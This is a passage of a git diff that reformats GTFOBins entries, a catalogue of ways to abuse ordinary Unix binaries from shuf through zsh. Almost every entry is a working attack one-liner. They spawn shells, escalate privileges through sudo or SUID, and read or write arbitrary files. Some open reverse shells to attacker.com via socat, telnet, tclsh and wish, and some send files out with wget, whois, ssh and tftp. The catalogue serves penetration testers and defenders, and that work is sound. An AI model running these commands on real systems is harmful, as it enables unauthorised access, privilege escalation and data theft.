LFILE=file_to_write + shuf -e data -o "$LFILE" + suid-enabled: + - description: + code: | + LFILE=file_to_write + ./shuf -e data -o "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_write + sudo shuf -e data -o "$LFILE" --- diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md index 2e84b46..dc524ff 100644 --- a/_gtfobins/socat.md +++ b/_gtfobins/socat.md @@ -1,14 +1,16 @@ --- functions: reverse-shell-interactive: - - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane + - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on + the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane bind-shell-interactive: - - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell. - code: | - LPORT=12345 - socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane + - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 + on the attacker box to connect to the shell. + code: | + LPORT=12345 + socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane --- diff --git a/_gtfobins/sort.md b/_gtfobins/sort.md index 528d912..42f8b2c 100644 --- a/_gtfobins/sort.md +++ b/_gtfobins/sort.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo sort -m "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./sort -m "$LFILE" file-read: - - code: | - LFILE=file_to_read - sort -m "$LFILE" + - code: | + LFILE=file_to_read + sort -m "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./sort -m "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo sort -m "$LFILE" --- diff --git a/_gtfobins/sqlite3.md b/_gtfobins/sqlite3.md index f9ad23f..5b4f1f2 100644 --- a/_gtfobins/sqlite3.md +++ b/_gtfobins/sqlite3.md @@ -1,21 +1,21 @@ --- functions: execute-interactive: - - code: sqlite3 /dev/null '.shell /bin/sh' - sudo-enabled: - - code: sudo sqlite3 /dev/null '.shell /bin/sh' - suid-limited: - - code: ./sqlite3 /dev/null '.shell /bin/sh' + - code: sqlite3 /dev/null '.shell /bin/sh' file-write: - - code: | - LFILE=file_to_write - sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' + - code: | + LFILE=file_to_write + sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";' file-read: - - code: | - LFILE=file_to_read - sqlite3 << EOF - CREATE TABLE t(line TEXT); - .import $LFILE t - SELECT * FROM t; - EOF + - code: | + LFILE=file_to_read + sqlite3 << EOF + CREATE TABLE t(line TEXT); + .import $LFILE t + SELECT * FROM t; + EOF + sudo-enabled: + - code: sudo sqlite3 /dev/null '.shell /bin/sh' + suid-limited: + - code: "./sqlite3 /dev/null '.shell /bin/sh'" --- diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index 71c5e10..bd3a290 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -1,30 +1,32 @@ --- functions: execute-interactive: - - description: Reconnecting may help bypassing restricted shells. - code: ssh localhost $SHELL --noprofile --norc - - description: Spawn interactive shell through ProxyCommand option. - code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x - sudo-enabled: - - description: Spawn interactive root shell through ProxyCommand option. - code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x - download: - - description: Fetch a remote file from a SSH server. - code: | - HOST=user@attacker.com - RPATH=file_to_get - LPATH=file_to_save - ssh $HOST "cat $RPATH" > $LPATH + - description: Reconnecting may help bypassing restricted shells. + code: ssh localhost $SHELL --noprofile --norc + - description: Spawn interactive shell through ProxyCommand option. + code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" + x upload: - - description: Send local file to a SSH server. - code: | - HOST=user@attacker.com - RPATH=file_to_save - LPATH=file_to_send - ssh $HOST "cat > $RPATH" < $LPATH + - description: Send local file to a SSH server. + code: | + HOST=user@attacker.com + RPATH=file_to_save + LPATH=file_to_send + ssh $HOST "cat > $RPATH" < $LPATH + download: + - description: Fetch a remote file from a SSH server. + code: | + HOST=user@attacker.com + RPATH=file_to_get + LPATH=file_to_save + ssh $HOST "cat $RPATH" > $LPATH file-read: - - description: The read file content is corrupted by error prints. - code: | - LFILE=file_to_read - ssh -F $LFILE localhost + - description: The read file content is corrupted by error prints. + code: | + LFILE=file_to_read + ssh -F $LFILE localhost + sudo-enabled: + - description: Spawn interactive root shell through ProxyCommand option. + code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh + -i'" x --- diff --git a/_gtfobins/stdbuf.md b/_gtfobins/stdbuf.md index 222d68b..c0e4181 100644 --- a/_gtfobins/stdbuf.md +++ b/_gtfobins/stdbuf.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: stdbuf -i0 /bin/sh - sudo-enabled: - - code: sudo stdbuf -i0 /bin/sh + - code: stdbuf -i0 /bin/sh suid-enabled: - - code: ./stdbuf -i0 /bin/sh -p + - code: "./stdbuf -i0 /bin/sh -p" + sudo-enabled: + - code: sudo stdbuf -i0 /bin/sh --- diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md index 61374f4..2302f19 100644 --- a/_gtfobins/strace.md +++ b/_gtfobins/strace.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: strace -o /dev/null /bin/sh - sudo-enabled: - - code: sudo strace -o /dev/null /bin/sh + - code: strace -o /dev/null /bin/sh suid-enabled: - - code: ./strace -o /dev/null /bin/sh -p + - code: "./strace -o /dev/null /bin/sh -p" + sudo-enabled: + - code: sudo strace -o /dev/null /bin/sh --- diff --git a/_gtfobins/tail.md b/_gtfobins/tail.md index 73d0c97..f7090f1 100644 --- a/_gtfobins/tail.md +++ b/_gtfobins/tail.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo tail -c1G "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./tail -c1G "$LFILE" file-read: - - code: | - LFILE=file_to_read - tail -c1G "$LFILE" + - code: | + LFILE=file_to_read + tail -c1G "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./tail -c1G "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo tail -c1G "$LFILE" --- diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md index 19fd34d..01afeef 100644 --- a/_gtfobins/tar.md +++ b/_gtfobins/tar.md @@ -1,24 +1,24 @@ --- functions: execute-interactive: - - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh execute-non-interactive: - - description: This only works for GNU tar. - code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' - sudo-enabled: - - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - suid-limited: - - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + - description: This only works for GNU tar. + code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' file-write: - - description: This only works for GNU tar. - code: | - LFILE=file_to_write - TF=$(mktemp) - echo data > "$TF" - tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P + - description: This only works for GNU tar. + code: | + LFILE=file_to_write + TF=$(mktemp) + echo data > "$TF" + tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P file-read: - - description: This only works for GNU tar. - code: | - LFILE=file_to_read - tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' + - description: This only works for GNU tar. + code: | + LFILE=file_to_read + tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' + sudo-enabled: + - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh + suid-limited: + - code: "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" --- diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md index 78630bb..7c90197 100644 --- a/_gtfobins/taskset.md +++ b/_gtfobins/taskset.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: taskset 1 /bin/sh - sudo-enabled: - - code: sudo taskset 1 /bin/sh + - code: taskset 1 /bin/sh suid-enabled: - - code: ./taskset 1 /bin/sh -p + - code: "./taskset 1 /bin/sh -p" + sudo-enabled: + - code: sudo taskset 1 /bin/sh --- diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md index f233314..582cd12 100644 --- a/_gtfobins/tclsh.md +++ b/_gtfobins/tclsh.md @@ -1,21 +1,21 @@ --- functions: execute-interactive: - - code: | - tclsh - exec /bin/sh <@stdin >@stdout 2>@stderr - sudo-enabled: - - code: | - sudo tclsh - exec /bin/sh <@stdin >@stdout 2>@stderr - suid-enabled: - - code: | - ./tclsh - exec /bin/sh -p <@stdin >@stdout 2>@stderr + - code: | + tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh + suid-enabled: + - code: | + ./tclsh + exec /bin/sh -p <@stdin >@stdout 2>@stderr + sudo-enabled: + - code: | + sudo tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr --- diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md index 51b3558..a10c8c7 100644 --- a/_gtfobins/tee.md +++ b/_gtfobins/tee.md @@ -1,17 +1,18 @@ --- -description: | - It can only append data if the destination exists. +description: 'It can only append data if the destination exists. + +' functions: - sudo-enabled: - - code: | - LFILE=file_to_write - echo data | sudo tee -a "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_write - echo data | ./tee -a "$LFILE" file-write: - - code: | - LFILE=file_to_write - echo data | ./tee -a "$LFILE" + - code: | + LFILE=file_to_write + echo data | ./tee -a "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_write + echo data | ./tee -a "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_write + echo data | sudo tee -a "$LFILE" --- diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md index 80946c8..e237c64 100644 --- a/_gtfobins/telnet.md +++ b/_gtfobins/telnet.md @@ -1,36 +1,35 @@ --- functions: execute-interactive: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - telnet $RHOST $RPORT - ^] - !/bin/sh + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + telnet $RHOST $RPORT + ^] + !/bin/sh reverse-shell-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - RHOST=attacker.com - RPORT=12345 - TF=$(mktemp) - rm $TF - mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + TF=$(mktemp) + rm $TF + mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF sudo-enabled: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - sudo telnet $RHOST $RPORT - ^] - !/bin/sh + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + sudo telnet $RHOST $RPORT + ^] + !/bin/sh suid-limited: - - description: BSD version only. Needs to be connected first. - code: | - RHOST=attacker.com - RPORT=12345 - ./telnet $RHOST $RPORT - ^] - !/bin/sh - + - description: BSD version only. Needs to be connected first. + code: | + RHOST=attacker.com + RPORT=12345 + ./telnet $RHOST $RPORT + ^] + !/bin/sh --- diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md index f391860..173edd6 100644 --- a/_gtfobins/tftp.md +++ b/_gtfobins/tftp.md @@ -1,15 +1,15 @@ --- functions: upload: - - description: Send local file to a TFTP server. - code: | - RHOST=attacker.com - tftp $RHOST - put file_to_send + - description: Send local file to a TFTP server. + code: | + RHOST=attacker.com + tftp $RHOST + put file_to_send download: - - description: Fetch a remote file from a TFTP server. - code: | - RHOST=attacker.com - tftp $RHOST - get file_to_get + - description: Fetch a remote file from a TFTP server. + code: | + RHOST=attacker.com + tftp $RHOST + get file_to_get --- diff --git a/_gtfobins/time.md b/_gtfobins/time.md index 91c6290..97c4be1 100644 --- a/_gtfobins/time.md +++ b/_gtfobins/time.md @@ -4,9 +4,9 @@ description: | behave differently than` /usr/bin/time`, hence the absolute path. functions: execute-interactive: - - code: /usr/bin/time /bin/sh - sudo-enabled: - - code: sudo /usr/bin/time /bin/sh + - code: "/usr/bin/time /bin/sh" suid-enabled: - - code: ./time /bin/sh -p + - code: "./time /bin/sh -p" + sudo-enabled: + - code: sudo /usr/bin/time /bin/sh --- diff --git a/_gtfobins/timeout.md b/_gtfobins/timeout.md index fa50e90..6a4742a 100644 --- a/_gtfobins/timeout.md +++ b/_gtfobins/timeout.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: timeout 7d /bin/sh - sudo-enabled: - - code: sudo timeout --foreground 7d /bin/sh + - code: timeout 7d /bin/sh suid-enabled: - - code: ./timeout 7d /bin/sh -p + - code: "./timeout 7d /bin/sh -p" + sudo-enabled: + - code: sudo timeout --foreground 7d /bin/sh --- diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md index 014d734..6da459d 100644 --- a/_gtfobins/ul.md +++ b/_gtfobins/ul.md @@ -3,16 +3,16 @@ description: | The read file content is corrupted by replacing occurrences of `$'\b_'` to terminal sequences and by converting tabs to spaces. functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo ul "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./ul "$LFILE" file-read: - - code: | - LFILE=file_to_read - ul "$LFILE" + - code: | + LFILE=file_to_read + ul "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./ul "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo ul "$LFILE" --- diff --git a/_gtfobins/unexpand.md b/_gtfobins/unexpand.md index 886d27f..601ea73 100644 --- a/_gtfobins/unexpand.md +++ b/_gtfobins/unexpand.md @@ -1,15 +1,15 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo unexpand -t99999999 "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./unexpand -t99999999 "$LFILE" file-read: - - code: | - LFILE=file_to_read - unexpand -t99999999 "$LFILE" + - code: | + LFILE=file_to_read + unexpand -t99999999 "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./unexpand -t99999999 "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo unexpand -t99999999 "$LFILE" --- diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md index b8b09f8..d2208d6 100644 --- a/_gtfobins/uniq.md +++ b/_gtfobins/uniq.md @@ -1,17 +1,18 @@ --- -description: | - The read file content is corrupted by squashing multiple adjacent lines. +description: 'The read file content is corrupted by squashing multiple adjacent lines. + +' functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo uniq "$LFILE" - suid-enabled: - - code: | - LFILE=file_to_read - ./uniq "$LFILE" file-read: - - code: | - LFILE=file_to_read - uniq "$LFILE" + - code: | + LFILE=file_to_read + uniq "$LFILE" + suid-enabled: + - code: | + LFILE=file_to_read + ./uniq "$LFILE" + sudo-enabled: + - code: | + LFILE=file_to_read + sudo uniq "$LFILE" --- diff --git a/_gtfobins/unshare.md b/_gtfobins/unshare.md index 412774b..222cac2 100644 --- a/_gtfobins/unshare.md +++ b/_gtfobins/unshare.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: unshare /bin/sh - sudo-enabled: - - code: sudo unshare /bin/sh + - code: unshare /bin/sh suid-enabled: - - code: ./unshare -r /bin/sh + - code: "./unshare -r /bin/sh" + sudo-enabled: + - code: sudo unshare /bin/sh --- diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md index 43ff1da..a6849d1 100644 --- a/_gtfobins/vi.md +++ b/_gtfobins/vi.md @@ -1,20 +1,21 @@ --- functions: execute-interactive: - - code: vi -c ':!/bin/sh' - - code: | - vi - :set shell=/bin/sh - :shell - sudo-enabled: - - code: sudo vi -c ':!/bin/sh' - suid-enabled: - - code: ./vi -c ':!/bin/sh -p' - file-read: - - code: | - vi file_to_read + - code: vi -c ':!/bin/sh' + - code: | + vi + :set shell=/bin/sh + :shell file-write: - - code: | - vi file_to_write - w + - code: | + vi file_to_write + w + file-read: + - code: 'vi file_to_read + +' + suid-enabled: + - code: "./vi -c ':!/bin/sh -p'" + sudo-enabled: + - code: sudo vi -c ':!/bin/sh' --- diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md index ef24de0..dc8fd22 100644 --- a/_gtfobins/watch.md +++ b/_gtfobins/watch.md @@ -1,12 +1,12 @@ --- functions: execute-non-interactive: - - code: watch /usr/bin/id - sudo-enabled: - - code: sudo watch /usr/bin/id + - code: watch /usr/bin/id suid-enabled: - - description: This keeps the SUID privileges only if the `-x` option is present. - code: ./watch -x /usr/bin/id + - description: This keeps the SUID privileges only if the `-x` option is present. + code: "./watch -x /usr/bin/id" + sudo-enabled: + - code: sudo watch /usr/bin/id suid-limited: - - code: ./watch /usr/bin/id + - code: "./watch /usr/bin/id" --- diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index 1c141e6..16ccf00 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -1,15 +1,16 @@ --- functions: upload: - - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - code: | - export URL=http://attacker.com/ - export LFILE=file_to_send - wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL + - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. + Run an HTTP service on the attacker box to collect the file. + code: | + export URL=http://attacker.com/ + export LFILE=file_to_send + wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL download: - - description: Fetch a remote file via HTTP GET request. - code: | - export URL=http://attacker.com/file_to_get - export LFILE=file_to_save - wget $URL -O $LFILE + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + wget $URL -O $LFILE --- diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md index f0e0d21..71bffd9 100644 --- a/_gtfobins/whois.md +++ b/_gtfobins/whois.md @@ -1,31 +1,37 @@ --- -description: | - `whois` hangs waiting for the remote peer to close the socket. +description: "`whois` hangs waiting for the remote peer to close the socket.\n" functions: upload: - - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - whois -h $RHOST -p $RPORT "`cat $LFILE`" - - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_send - whois -h $RHOST -p $RPORT "`base64 $LFILE`" + - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` + on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` + and its length is limited by the maximum size of arguments. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + whois -h $RHOST -p $RPORT "`cat $LFILE`" + - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' + | base64 -d > "file_to_save"` on the attacker box to collect the file. The file + length is limited by the maximum size of arguments. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + whois -h $RHOST -p $RPORT "`base64 $LFILE`" download: - - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_save - whois -h $RHOST -p $RPORT > "$LFILE" - - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file. - code: | - RHOST=attacker.com - RPORT=12345 - LFILE=file_to_save - whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" + - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 + < "file_to_send"` on the attacker box to send the file. The file has instances + of `$'\x0d'` stripped. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_save + whois -h $RHOST -p $RPORT > "$LFILE" + - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" + | nc -l -p 12345` on the attacker box to send the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_save + whois -h $RHOST -p $RPORT | base64 -d > "$LFILE" --- diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md index a65439e..e495e28 100644 --- a/_gtfobins/wish.md +++ b/_gtfobins/wish.md @@ -1,17 +1,17 @@ --- functions: execute-interactive: - - code: | - wish - exec /bin/sh <@stdin >@stdout 2>@stderr - sudo-enabled: - - code: | - sudo wish - exec /bin/sh <@stdin >@stdout 2>@stderr + - code: | + wish + exec /bin/sh <@stdin >@stdout 2>@stderr reverse-shell-non-interactive: - - description: Run `nc -l -p 12345` on the attacker box to receive the shell. - code: | - export RHOST=attacker.com - export RPORT=12345 - echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish + sudo-enabled: + - code: | + sudo wish + exec /bin/sh <@stdin >@stdout 2>@stderr --- diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md index 5945187..a38ac2e 100644 --- a/_gtfobins/xargs.md +++ b/_gtfobins/xargs.md @@ -1,14 +1,16 @@ --- functions: execute-non-interactive: - - code: xargs -a /dev/null /usr/bin/id - sudo-enabled: - - code: sudo xargs -a /dev/null /usr/bin/id - suid-enabled: - - code: ./xargs -a /dev/null /usr/bin/id + - code: xargs -a /dev/null /usr/bin/id file-read: - - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. - code: | - LFILE=file_to_read - xargs -a "$LFILE" -0 + - description: This works as long as the file does not contain the NUL character, + also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. + GNU version only. + code: | + LFILE=file_to_read + xargs -a "$LFILE" -0 + suid-enabled: + - code: "./xargs -a /dev/null /usr/bin/id" + sudo-enabled: + - code: sudo xargs -a /dev/null /usr/bin/id --- diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md index c64b879..7d854bb 100644 --- a/_gtfobins/xxd.md +++ b/_gtfobins/xxd.md @@ -1,19 +1,19 @@ --- functions: - sudo-enabled: - - code: | - LFILE=file_to_read - sudo xxd "$LFILE" | xxd -r - suid-enabled: - - code: | - LFILE=file_to_read - ./xxd "$LFILE" | xxd -r - file-read: - - code: | - LFILE=file_to_read - xxd "$LFILE" | xxd -r file-write: - - code: | - LFILE=file_to_write - echo data | xxd | xxd -r - "$LFILE" + - code: | + LFILE=file_to_write + echo data | xxd | xxd -r - "$LFILE" + file-read: + - code: | + LFILE=file_to_read + xxd "$LFILE" | xxd -r + suid-enabled: + - code: | + LFILE=file_to_read + ./xxd "$LFILE" | xxd -r + sudo-enabled: + - code: | + LFILE=file_to_read + sudo xxd "$LFILE" | xxd -r --- diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md index 1db7501..4e73feb 100644 --- a/_gtfobins/zsh.md +++ b/_gtfobins/zsh.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: zsh - sudo-enabled: - - code: sudo zsh + - code: zsh suid-enabled: - - code: ./zsh + - code: "./zsh" + sudo-enabled: + - code: sudo zsh ---